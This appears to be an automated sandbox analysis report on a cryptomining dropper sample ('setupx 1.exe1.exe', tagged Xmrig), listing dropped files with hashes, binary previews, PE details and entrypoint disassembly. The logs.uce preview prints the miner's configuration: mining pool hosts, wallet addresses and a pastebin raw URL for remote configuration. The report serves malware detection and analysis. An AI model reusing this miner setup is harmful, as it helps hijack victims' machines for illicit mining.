	stelarix.exe	Get hash	malicious	Xmrig	Browse
	nbtypsfikkad.exe	Get hash	malicious	Xmrig	Browse
	biopderfawd.exe	Get hash	malicious	Xmrig	Browse
	SecuriteInfo.com.Trojan.Inject5.18019.4796.15988.exe	Get hash	malicious	Xmrig	Browse
	vHl9kBfoX9.exe	Get hash	malicious	Xmrig	Browse
	vHl9kBfoX9.exe	Get hash	malicious	Unknown	Browse
	5JIEYPkSVW.exe	Get hash	malicious	Xmrig	Browse
	External.exe1.exe	Get hash	malicious	Xmrig	Browse
	Inst#U0430ll.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse

Created / dropped Files

C:\ProgramData\Dllhost\WinRing0x64.sys

Download File

Process:	C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Joe Sandbox View:	Filename: Kiddion's Modest Menu v.1.0.0.exe, Detection: malicious, Browse Filename: stelarix.exe, Detection: malicious, Browse Filename: nbtypsfikkad.exe, Detection: malicious, Browse Filename: biopderfawd.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.Inject5.18019.4796.15988.exe, Detection: malicious, Browse Filename: vHl9kBfoX9.exe, Detection: malicious, Browse Filename: vHl9kBfoX9.exe, Detection: malicious, Browse Filename: 5JIEYPkSVW.exe, Detection: malicious, Browse Filename: External.exe1.exe, Detection: malicious, Browse Filename: Inst#U0430ll.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

C:\ProgramData\Dllhost\winlogson.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe
File Type:	PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Category:	modified
Size (bytes):	881775
Entropy (8bit):	6.168193790981251
Encrypted:	false
SSDEEP:	24576:gKpN5NsUPAFv5907H5iHxnY+9pB4j99p/BdJuvBLbh9TZbKs:ZpNHsUPAFM7H58nB9pB4j99p/BdJqLbx
MD5:	0464D0789E4F833F59B23197D409E960
SHA1:	71365D1765A59AE6C645918EFE4BF9D3D95F1A5D
SHA-256:	CEB4B81A126AEC0F59619205CF51EAB6C5712B4A97987BC8BA729A2991ED7B09
SHA-512:	F403567B5BA3E024CA5E860B3350D53CF57F8127063EBE7A4C3A67BA5B8ECB94EC7566C576AE9DE598FCED24446E1B2B9A983C471AC6ABE0BAC4E386CD490948
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....c.d...............&.._...}...2............@.............................0......L\|~...`... .................................................F...@...\....v.................l...........................`.t.(......................@............................text....._......._.................`..`.data...`.... _...... _.............@....rdata.......0`......&`.............@..@.pdata........v.......v.............@..@.xdata........y.......x.............@..@.bss......2...\|..........................idata...F......H....\|.............@....CRT....h.... ........\|.............@....tls.........0........\|.............@....rsrc....\...@...\....\|.............@....reloc..l............X}.............@..B........................................................................................................................................................................

C:\ProgramData\HostData\logs.uce

Download File

Process:	C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	344
Entropy (8bit):	5.688678537167479
Encrypted:	false
SSDEEP:	6:DiYgE/ovKDMcPmriYgE/ovKDMcBCrT5fhXGT2QSBa5ydXnzAiGUlQPoy68f1KAK3:uwgyXmGwgyoH55GT2Qtyc3n1KAU
MD5:	1A4E05716C2A8B7A5F34172178340305
SHA1:	2E1A747A57E99B7FA2F691568104C5431F79A849
SHA-256:	FB42753CE0F515D7E4BF6B3C86895CC14FC59BE6A1A81D429A34B88F48286173
SHA-512:	41D18BDA9117C3F0162F5ACA3C63FE139A38ED4A419619992C258CF1107BF4C2D0EC9B9CFB402D19347FE4C50CFEA0ED6FBD4602781027B725463C613E0837CA
Malicious:	false
Preview:	ETCHASH..etc.2miners.com:1010..0x7fe2496e102A4E43617eb2E95B5d1D1C3f6Db972..ETCHASH..etc.2miners.com:1010..0x7fe2496e102A4E43617eb2E95B5d1D1C3f6Db972..XMR..pool.hashvault.pro:443..ZEPHYR3c6xGj8D5oP4tzKQbPn2dNdse6aPRWxNBiwBFrg7RFN4jf1cqgj5qdR9Wdru44g2FATJHHH38oFDTH6krgKntSzLc5Csy3t..Dnepr..F(Ff4f67h((jgf..cp..https://pastebin.com/raw/YpJeSRBC..

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_setupx 1.exe1.ex_b692906daec281bca74e7bfa93f9f1ed2c1fc_af2557d0_fd0ac405-4335-48d1-8ce2-ed376d339f00\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9188424869741152
Encrypted:	false
SSDEEP:	192:xBDOEg1WY5C0BU/eacjICBqzuiF4Z24IO82j4k:jOb1WY5JBU/eacjIHzuiF4Y4IO82j4
MD5:	75C305D7C7677906C3F63A18405138AE
SHA1:	26B4B0F8C2A19CABCE4245E498D086AAD1A80502
SHA-256:	682D48ED40729E7CB38E8523C02859D7F85194ECF53133856C5637EC9BF7BD01
SHA-512:	5A1E8F7D64F19914A1E98FAF6A7A3A6132A12B4D191174930E2185AB30945A56CAD59C111EAE69954E381B9B6CADE67D15AEE7729D73E01BB2CDC415759D2280
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.6.3.4.2.8.1.6.2.1.5.8.0.7.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.6.3.4.2.8.1.6.8.8.7.6.7.9.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.0.a.c.4.0.5.-.4.3.3.5.-.4.8.d.1.-.8.c.e.2.-.e.d.3.7.6.d.3.3.9.f.0.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.1.d.2.e.8.e.4.-.0.d.9.b.-.4.9.1.e.-.9.7.8.f.-.5.1.7.d.e.8.d.3.8.8.d.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.e.t.u.p.x. .1...e.x.e.1...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.1.4.-.0.0.0.1.-.0.0.1.8.-.6.2.2.8.-.6.c.2.3.1.4.9.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.e.3.f.3.4.5.5.5.d.4.7.8.7.5.5.f.f.0.b.3.0.2.2.e.f.6.4.a.8.e.6.0.0.0.0.f.f.f.f.!.0.0.0.0.8.6.a.b.8.3.6.8.a.7.2.f.9.4.9.0.c.1.7.5.d.e.5.0.3.2.c.2.b.9.f.2.a.2.1.9.f.0.e.e.!.s.e.t.u.p.x. .1...e.x.e.1...e.x.e.....T.a.r.g.e.t.A.p.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAD0A.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Mar 13 12:33:36 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	31446
Entropy (8bit):	2.2166951612958057
Encrypted:	false
SSDEEP:	192:Fuyh1eXNr+XMUAsOYs3WslTHOgSKjnIXJF0JJ:HhWrvxjL3WyTJjnX
MD5:	19201D9D42A0FDBAD93D4D91450A7F0F
SHA1:	25A3DB362B6FA4A519970D959C2342C11C2D853F
SHA-256:	67A3F9346CFCE0DEEE80CB0F769567E37A6DA6FDB11E09A1E8E91F3A4604C096
SHA-512:	779D19B8CEDE459909491929C6E897C4451561D952987E09CD494DDAD8DF5F81DD4914C4274872191F96206AC63D622426232313E5E8DAB93A3E15C111EDAEA8
Malicious:	false
Preview:	MDMP..a..... ..........g............4...............<.......T...F'..........T.......8...........T...........h...n_..........<...........(...............................................................................eJ..............GenuineIntel............T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAE43.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8420
Entropy (8bit):	3.6976593438302188
Encrypted:	false
SSDEEP:	192:R6l7wVeJ1706EP6YNlSU9xDgmfQ94prY89boPsfMYm:R6lXJ1I6M6Y/SU9xDgmfQ9Yo0fy
MD5:	F7832FACCD2BBFBBAF6EFD0CE321D12E
SHA1:	4F6B1277DD03246717D75A1B8FEE4E8E0AC30689
SHA-256:	FFFC4F4A0EB3348D731776C7C7F433E72796948547F85F83F0705942A04B9F8A
SHA-512:	F4507CBEC10A4C6C442BE2DD708783A79BEE42B677BCFC4E64F01121BFD352277A1B2AB7CE3756502D61779E3656B4023FB311FA8468BAF134EF93324F681ECF
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.7.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAE83.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4735
Entropy (8bit):	4.47638974130953
Encrypted:	false
SSDEEP:	48:cvIwWl8zsQtJg77aI9rjUWpW8VYDLPYm8M4Jz9FN+q8vJ3HMD1R4d:uIjfWI7VN7V+SJJKJMD1R4d
MD5:	E5C54A966691DE3720DE499C6826AC49
SHA1:	05C3249D715FD8C8152CBA59F9C07229217CABF2
SHA-256:	38EBCD486E2724F627B4826B2905ECDBBE2FF53BBA1DBD6C69BA1FB2E2DCC1CB
SHA-512:	AA2BC6D2F870913C8AC90971E06BE6A876E4670C842D2A39FF68789B0AE93D4292A6BEED31FA1F88C387959573A56634A4DD074315CFCE39785451571AAE0D86
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="759096" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380747059108785
Encrypted:	false
SSDEEP:	48:lylWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//ZPUyut:lGLHxvIIwLgZ2KRHWLOugbt
MD5:	7B68955B5D2784008174D2F28F3A919C
SHA1:	42FF3A1CC507BC0DED73BB414DC3DF8D7EC5A667
SHA-256:	BCFB8DEDCF9BFF1C0E59BC069AD4BFD15873AB22CA69D280044C808BA92ADD08
SHA-512:	4D2816F2ECE76889F6D06A3DB451267CCCB7B598494116AC6446E493B3EFD57BF2B0A206F15B49A765729719F63194F82E1318C69010FDA7D3725EE117EC79E1
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe

Download File

Process:	C:\Users\user\Desktop\setupx 1.exe1.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	21504
Entropy (8bit):	5.163407645311707
Encrypted:	false
SSDEEP:	384:DbjjHZQ3N5ofJHFrybCN906pXtM5PFNwN9zmuM15/ufjWrynX:DbjjHe38BgbGqBFNwvsNe
MD5:	C11A82D699A06D9B8BA4296E0C562AE4
SHA1:	E91963FE8DEF3ED151333A6A66D005237600BA30
SHA-256:	483B1D7DAC70DE82E9B22A0C1ED775CF7E10B0A3790C5AA1B9215DBCD1754302
SHA-512:	CC8644279EA2CEBF70F594F6CC48D6EBBC10D036B7DCF1008FC05565DA85CC36F7E8AF7FAA49B7C117C9A6AC94D7C007A99B53EC1DD668A7F8C28DC25B410A54
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...zX!..........."...0..H..........:f... ........@.. ....................................`..................................e..O...................................4e..8............................................ ............... ..H............text...@F... ...H.................. ..`.rsrc................J..............@..@.reloc...............R..............@..B.................f......H........6...,...........c..p............................................0............}.....(.......(.....(.....(......(......(.....~....r...po......,0.~....~....r...p.(.....~....~....r#..p.(......+..~....~....r...p.(......~....~....rC..p.(.....(.....(......(.........0..!.........(......%o.... ....`o.......+......0............ ....(..... .'...1........s......~....o........s.........r[..p.+....X......o....%............-......8...............E............!.../...:...E...P...[

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hwmmczk5.bcz.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u0bjsjs4.r0o.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uctsftz5.uma.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wxg1jhr4.rfo.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\logs.uce

Download File

Process:	C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	344
Entropy (8bit):	5.688678537167479
Encrypted:	false
SSDEEP:	6:DiYgE/ovKDMcPmriYgE/ovKDMcBCrT5fhXGT2QSBa5ydXnzAiGUlQPoy68f1KAK3:uwgyXmGwgyoH55GT2Qtyc3n1KAU
MD5:	1A4E05716C2A8B7A5F34172178340305
SHA1:	2E1A747A57E99B7FA2F691568104C5431F79A849
SHA-256:	FB42753CE0F515D7E4BF6B3C86895CC14FC59BE6A1A81D429A34B88F48286173
SHA-512:	41D18BDA9117C3F0162F5ACA3C63FE139A38ED4A419619992C258CF1107BF4C2D0EC9B9CFB402D19347FE4C50CFEA0ED6FBD4602781027B725463C613E0837CA
Malicious:	false
Preview:	ETCHASH..etc.2miners.com:1010..0x7fe2496e102A4E43617eb2E95B5d1D1C3f6Db972..ETCHASH..etc.2miners.com:1010..0x7fe2496e102A4E43617eb2E95B5d1D1C3f6Db972..XMR..pool.hashvault.pro:443..ZEPHYR3c6xGj8D5oP4tzKQbPn2dNdse6aPRWxNBiwBFrg7RFN4jf1cqgj5qdR9Wdru44g2FATJHHH38oFDTH6krgKntSzLc5Csy3t..Dnepr..F(Ff4f67h((jgf..cp..https://pastebin.com/raw/YpJeSRBC..

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.376698841488419
Encrypted:	false
SSDEEP:	6144:5jVfpi6ceLP/9skLmb0ByWWSPtaJG8nAge3nONQqZaK2FIeC/7ZcX1OZC:RV1ryWWI/ONQqYMjyFEC
MD5:	A0F81277C8F45A06DC2EC922D72027A4
SHA1:	D34B4BFD4DB4CD4580CBBD0B1DF1DEB89C783E6C
SHA-256:	DE14545A3BB3E8D6D0AA2B52AB1FB2995B400E98E77CDA20384D0BE27C99A3CA
SHA-512:	0F63CBE3BD9175FE6AABF90A9A7DBC217F80938006B4099ACAD7F5559CA48C17401C28246EFDA01B4B09E44D144548151725ECA821FA78FC125F83914EB2826B
Malicious:	false
Preview:	regfE...E....\.Z.................... ....@......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmNW..e.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	3.8490329332863964
Encrypted:	false
SSDEEP:	384:VO9o+iKioyyQPRI2oPFdk8DlS1ysk8meJ/dwhP:VOZiDoyFPRI3PI8Ds1ysk8HeP
MD5:	FD8610034E5BDA92D92635FC7D7DBFBF
SHA1:	C3F36BCB47094AF2B0BC374552FCFC6B82EB321F
SHA-256:	ECE238D333D8EFD54E6A0BAFE448A7A4FAD742120A828801F3681933A208479C
SHA-512:	9BD2E051F18410CD6442EAE74B3C9BE60EA039F1C941398F830ED785BA041ABB5DB8A3A1DD5AD26B1406E29E6CDA5F9574C10FBC8AB01113F3E0AF4058883637
Malicious:	false
Preview:	regfD...D....\.Z.................... ....@......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmNW..e.................................................................................................................................................................................................................................................................................................................................................HvLE.^......D....@......">.9v.k/1..........................0..hbin.................\.Z............nk,..\.Z....................h...................................<.......&...{11517B7C-E79D-4e20-961B-75A811715ADD}..`...sk..........B...........\...l.............H.........?...................?...................?........... ... ........... ... ...................$.N..........vk..4...`...........CreatingCommand.....O.n.e.D.r.i.v.e.S.e.t.u.p...e.x.e. ./.s.i.l.e.n.t.......vk..<.......

C:\logs.uce

Download File

Process:	C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	344
Entropy (8bit):	5.688678537167479
Encrypted:	false
SSDEEP:	6:DiYgE/ovKDMcPmriYgE/ovKDMcBCrT5fhXGT2QSBa5ydXnzAiGUlQPoy68f1KAK3:uwgyXmGwgyoH55GT2Qtyc3n1KAU
MD5:	1A4E05716C2A8B7A5F34172178340305
SHA1:	2E1A747A57E99B7FA2F691568104C5431F79A849
SHA-256:	FB42753CE0F515D7E4BF6B3C86895CC14FC59BE6A1A81D429A34B88F48286173
SHA-512:	41D18BDA9117C3F0162F5ACA3C63FE139A38ED4A419619992C258CF1107BF4C2D0EC9B9CFB402D19347FE4C50CFEA0ED6FBD4602781027B725463C613E0837CA
Malicious:	false
Preview:	ETCHASH..etc.2miners.com:1010..0x7fe2496e102A4E43617eb2E95B5d1D1C3f6Db972..ETCHASH..etc.2miners.com:1010..0x7fe2496e102A4E43617eb2E95B5d1D1C3f6Db972..XMR..pool.hashvault.pro:443..ZEPHYR3c6xGj8D5oP4tzKQbPn2dNdse6aPRWxNBiwBFrg7RFN4jf1cqgj5qdR9Wdru44g2FATJHHH38oFDTH6krgKntSzLc5Csy3t..Dnepr..F(Ff4f67h((jgf..cp..https://pastebin.com/raw/YpJeSRBC..

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	7.686476863915138
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	setupx 1.exe1.exe
File size:	1'360'384 bytes
MD5:	d3dfeb11e332ea228567f9f4ebafef51
SHA1:	86ab8368a72f9490c175de5032c2b9f2a219f0ee
SHA256:	79188b44c38f4fabdb8868d0fad3ba1b297b627e8a7d2438fcf7edbaf4c2a6c8
SHA512:	c6f8023785f9b32fa27cb45dcfe4468552c71b1cea8b807ae65987cfcc70a7d7e250770e75c07f28b097fbd05d1ddb32bc818ed1c00f526486414327a1772569
SSDEEP:	24576:6Ai/c6dNtEWZ4B+UsxoxbzmXFHaeclEX3fq6F+cONK1B3rRHaeclEX3fq6F+cON2:k0qNtnKB+UsxoxbzYF6TyX31F+6zrR6I
TLSH:	2155E07270C1C073F642A5B23598E3B5546BF672DE2E0FC7A2B4E7749148AC117AA12F
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......g..........................................@.......................................@.................................06..<..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x46e682
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x67D09BB6 [Tue Mar 11 20:23:18 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	d462aa757f68629e41b3df6e6d4c6a3c

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
call 00007F1CA4F722AAh
jmp 00007F1CA4F72119h
mov ecx, dword ptr [00496840h]
push esi
push edi
mov edi, BB40E64Eh
mov esi, FFFF0000h
cmp ecx, edi
je 00007F1CA4F722A6h
test esi, ecx
jne 00007F1CA4F722C8h
call 00007F1CA4F722D1h
mov ecx, eax
cmp ecx, edi
jne 00007F1CA4F722A9h
mov ecx, BB40E64Fh
jmp 00007F1CA4F722B0h
test esi, ecx
jne 00007F1CA4F722ACh
or eax, 00004711h
shl eax, 10h
or ecx, eax
mov dword ptr [00496840h], ecx
not ecx
pop edi
mov dword ptr [00496880h], ecx
pop esi
ret
push ebp
mov ebp, esp
sub esp, 14h
lea eax, dword ptr [ebp-0Ch]
xorps xmm0, xmm0
push eax
movlpd qword ptr [ebp-0Ch], xmm0
call dword ptr [00493864h]
mov eax, dword ptr [ebp-08h]
xor eax, dword ptr [ebp-0Ch]
mov dword ptr [ebp-04h], eax
call dword ptr [00493824h]
xor dword ptr [ebp-04h], eax
call dword ptr [00493820h]
xor dword ptr [ebp-04h], eax
